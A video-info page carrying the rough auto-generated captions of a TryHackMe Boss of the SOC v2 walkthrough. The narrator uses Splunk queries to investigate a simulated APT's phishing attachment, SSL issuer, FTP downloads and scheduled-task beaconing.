Investigating FTP with Splunk | TryHackMe Boss of the SOC v2

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
so me back here again and today we're doing the last task of splunk the last task is uh or includes 400 serious questions and it is considered as one of the easiest tasks you will ever encounter except the last question so basically this scenario is about investigating ftp traffic all right so let's get started so the first question is a federal law enforcement agency reports that tayden gang often spearfishes its victims with zip files that have to be opened with a password what is the name of the attachment center firstly by a malicious team gang actor okay so here the uh question highlights spear phishing okay zip files and a password which means that we have to look first in the email traffic or smtp traffic along with zip files so to construct a query i have just typed a query here and then we go to splunk highlighting the data sets source type smtp for emails and zip for uh or star or asterisk dot zip for zip files so we click on search and the number of events that have been returned are six so the number even six if we scroll down or if we just pipe this to reverse display the events in uh very first order so the oldest events appear first so taking a look at the first one so there is no mention of the attachment or sender or receiver let's go scroll down here we see we see here we have the sender jim smith and let's take a look at the subject the subject would give us some hint about the content of the email the subject is invoice so there could there's a good chance that attachment is here as an invoice if you click on show azure text uh the first line we have an attachment attachment name file name is invoice.zip which is the answer for the first question now what is the password to open the zip file so finding the password is not so so difficult if the zip file was actually encrypted then the password should be in the content of the email like the sender would have notified the receiver that the password is something like whatever right so if you look at the content of the email so starting from after content type and all the way okay we as we haven't received a servicization letter i'm assuming that you might have accidentally overlooked this invoice should you wish to bring an end to the agreement please let us know otherwise early withdrawal penalties will apply next month okay so please enter the password for the zip file and the password is all numbers right next one the tetengang apt group encrypts most of their traffic with ssl what is the ssl issuer that they use for the majority of their traffic answer guidance copy the field exactly including spaces all right so there is a mention for an ssl here so we would look for http traffic and then filter to look for https but the question here is highlighting ssl in general so we would assume that the tethering apt group uses ssl in all of their traffic which means we have to look for tcp traffic so let me copy the command so let's scroll up the source tcp we would like to look for all of the tcp traffic to find out uh the ssl used in the uh events and here the ip address is taken from previous questions so basically um we are looking for those who attacked the blue the brewer website if you click on the hint here no if you click if you scroll up the hints for the question is saying you will need to you'll need the attacker's ip address remember there was an ip address scanic blue talk so if you have completed the previous tasks go to task 200 or task two and remember that the ip address was forty five seven seven sixty five two hundred eleven so we use the ip address in the query to look for tcp traffic okay involving or including the ip address of the attacker we click on search since we're looking for ssl traffic we will look at interesting fields and in the existing fields we see fields related to ssl so in the question we are interested to find or are interested in finding the ssl issuer so let's see if the ssl issuer is listed in the interesting fields so we see there is a field called ssl assure we click on that we have only one which is c equal us which is the answer for the question all right what unusual file for an american company does winsis 32.dll cause to be downloaded into frosty environments as you can see the answer is in chinese characters maybe korean i'm not i'm not aware of the these languages but what unusual file for an american company the hint here is that the original file should be in a language that is unusual for an american company which means the file name is not in english that's the first hint to answer the question the second hint here does winsys32dll codes to be downloaded into frosty environments now here if you take this and google it see what it is let's take a look at the description from filenet okay it's a back door trojan file that connects to a remote irc server and waits for commands for the remote user it activates an irc client which provides the remote hacker access to your system so when as you can see the description here is saying it's not essential for windows so most probably this is kind of a dll trojan but here we'll we're looking at the executable file we want to see the dll file if there's a description available for it let's see microsoft here there's a blue screen i think the scenario is irrelevant description so the executable version of it is a vector and the snippet is by file.net so there is no consensus on the nature of this ddl file that's why we look at the hints if you go to question number four next task find an unusual file that was downloaded with min sys32dll now the hand here is saying that you have to investigate ftp traffic and i know that a file could be downloaded several ways one of it is ftp other ways could be by http but in the question we'll look for the the ftp traffic so let me grab the command and i will explain the parts of it so paste it so we look at the source or data set the source type is ftp since download operation is involved and the method is retrieved but before putting the method here and before putting reverse let's first search with the source type as ftp and see what kind or what are the number of events that will be returned so we have 1 490 events which is uh too much to go through that's why we have to look at interesting fields in interesting fields we see two important interesting fields one is method and other one is method parameter method is we have nine methods and for downloading files over ftp the method used is retrieved okay so we click on that and the number of events returned is 14 events which is good it means that we are going in the right direction 14 events is not that difficult to go through and filter to the answer so pipe that to reverse display the order first so we construct the timeline of the events oldest to newest so here we see connected reports file transferred all files successfully transferred okay here we see uh connected reports um files has fully downloaded download okay oh 104 parts to download file successfully transferred so it could be potential that the file has been downloaded uh this event so through azure text let's see here okay next one so we can see here the file names or the files that are being downloaded their names are listed under method parameters so maybe what we can do here we can reconstruct the query and type it to table method method parameter right method underscore browser to see what are the file names that have been downloaded dns nc so so it's pretty much obvious that the unusual file name to an american company is this one so this is the file that has been downloaded and at the same time unusual to an american company all right what is the first and last name of the poor innocent sap who was implicated in the metadata of the file that executed powershed empire on the first victims workstation so technically there was a file that executed the partial command on the target system this file has a name of a guy in its metadata okay so we have to look take a look at the malware itself and see its metadata we know we don't have access to the malware that's why the owner of the room has uploaded the malware to device manual analysis platforms and from that we will extract the answer so if we go to virustotal and here is the results of the scan on the malware itself if you go in the details you see the details and the other metadata of the file you see here we have um in the magic last saved by ryan cover so that's the only name mentioned in the metadata which is the answer to that question within the documents what kind of points is are men here are mentioned if you found the text so within the documents so we have to open the document itself to answer that question that's why we'll go to any run these links are provided by the owner of the room you can click on them directly and open it up so see here the file is was opened and inside the file you see in this screenshot congrats it looks like you have a virustotal account and choose to live on the edge if you find this turn it in for some cyber east egg points so the kind of points okay or uh that in the file cyberistic so the cyberistic the last one which is the most difficult to maintain persistence in the frostly network tayden gang apt configured several scheduled tasks to begin back to their c2 server one single web page is most contacted by the scheduled tasks answer simple answer example is index or images so the first thing to notice from the question is the presence of scheduled tasks so the attackers probably has created or used the schedule task executable file so the the first step in finding the answer is including the scheduled task keyword in the query in splunk so let me grab this first okay and go to splunk so we include the scheduled task in the query take a look at the number of events involving the scheduled tags so you have 103 events which is also not practical to go through one by one that's why we have to use the interesting fields among the interesting fields that we can use is the source type we have sysmone and we have event log and since we just were talking about scheduled tasks and beginning activity these kind of events are locked with sys mode or system monitor so if you change the source type to this node or include in the search query the number of events has been narrowed down significantly 67 events but we still have some work to do let's take a look at the interesting fields okay so since we're looking at the scheduled tasks most probably there is a comment that is being executed okay to transfer or to communicate with the c2 servers so we have parent process as you can see one is powershell if also we have independent command line as you can see we have partial commands all right so if we click on one of them or if we table let's use table table offers dw dub let's use the parent command line parent command line and then table parent command line also command line so we'd like to show the command line and the parent process of of the command line so we see dependent command we have partial command on the right the command line is as you can see the scheduled task so there is a scheduled task that is running powershell on registry key which is software microsoft network debug so how is that relevant to our question let's get back to the question to retain persistence in the frostline network telling gang apt configured several scheduled task to beacon back to the c2 server what single web page is most contacted by rescheduled tasks so arriving at the original comment that is executing powershell here you see it is related to registry so there is something that is being executed on the registry key software microsoft network debug now if we find out what are the registry keys and their corresponding values in this registry key or this registry path most likely we would end up with the exact values of the web pages that are being conducted that's why we switch to a new command the new command is this one so the source is window register you would like to examine the windows registry and the keyword is software microsoft network which is the path we take it from here now let me cancel two here two so one escape only so the number of events returned is four now if we examine them one by one let's take a look at this first one or let's say reverse oldest to newest okay first one so to take to extract the values of the keys we have to take a look at the data the data is base64 encoded string so we can just take it and record it with cyber chef okay copy and paste it you will see the uh characters here but this is not the one that contains the answer if you scroll down click on show eight lines this one if you copy this and paste it here you will see that in this slide we have https and this is the ip address attacker 443 using https and then we have slash login slash process dot php data equal download data right so most likely this is the url that's being visited by the scheduled task to communicate with the city server this is the url and as you can see slash login slash process.php so process.php is the php file that's being communicated with by the attackers so this is the answer for this question and finally the room is finished and you can find the answers and explanations of the answers for the previous tasks in my previous videos in the next videos i'm going to dominate the machine now so let's take a look now at the cyber defense pathway and see what we are where we are at the moment so we finished everything in the threat and vulnerability management except this one this room is not ready yet let's take a look at the security operations i'm monitoring the soak rooms so as you can see we have finished all of the roofs in this sock these rooms are not finished yet and they are in the pipeline so once finished we will provide the walkthrough for them instant response and forensic next videos we will tackle down the forensic asset response starting from autopsy and disk analysis with autopsy so that was for today i hope you like it and see you the next video
Info
Channel: Motasem Hamdan
Views: 9,180
Rating: undefined out of 5
Keywords: splunk, cybersecurity
Id: QlUq9TaM_fM
Channel Id: undefined
Length: 21min 30sec (1290 seconds)
Published: Sun Jun 20 2021
Related Videos
PASSKEYS - What they are, why we want them and how to use them!
John Savill's Technical Training
28K
Cybersecurity Architecture: Data Security
IBM Technology
40K
This Is Why You Can’t Go To Antarctica
Joe Scott
1.1M
Jiminy Glick Interviews Bill Maher | Real Time (HBO)
Real Time with Bill Maher
227K
Sha'Carri Richardson stumbles, recovers, then storms to 100m heat win at Olympic Trials | NBC Sports
NBC Sports
224K
Cybersecurity Architecture: Application Security
IBM Technology
51K
Stanley Cup Final Game 6: Florida Panthers vs. Edmonton Oilers | Full Game Highlights
NHL on ESPN
105K
Cybersecurity Architecture: Endpoints Are the IT Front Door - Guard Them
IBM Technology
51K
Cybersecurity Architecture: Roles and Tools
IBM Technology
88K
Redis Crash Course - the What, Why and How to use Redis as your primary database
TechWorld with Nana
417K
Deep Dive on Microsoft Entra Private Access
John Savill's Technical Training
32K
Cybersecurity IDR: Incident Detection & Response | Google Cybersecurity Certificate
Google Career Certificates
68K
Honolulu, Hawaii 1940s in color [60fps,Remastered] w/sound design added
NASS
12K
Overtime: Gov. Andrew Cuomo, Rep. Adam Kinzinger | Real Time with Bill Maher (HBO)
Real Time with Bill Maher
246K
JVC HR3500 Shipped in complaint was it won't eject but UPS managed to trash it on the way
12voltvids
3.2K
Cybersecurity Architecture: Who Are You? Identity and Access Management
IBM Technology
108K
Azure Master Class v2 - Module 10 - Monitoring & Security
John Savill's Technical Training
53K
Kubernetes Crash Course for Absolute Beginners [NEW]
TechWorld with Nana
2.6M
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.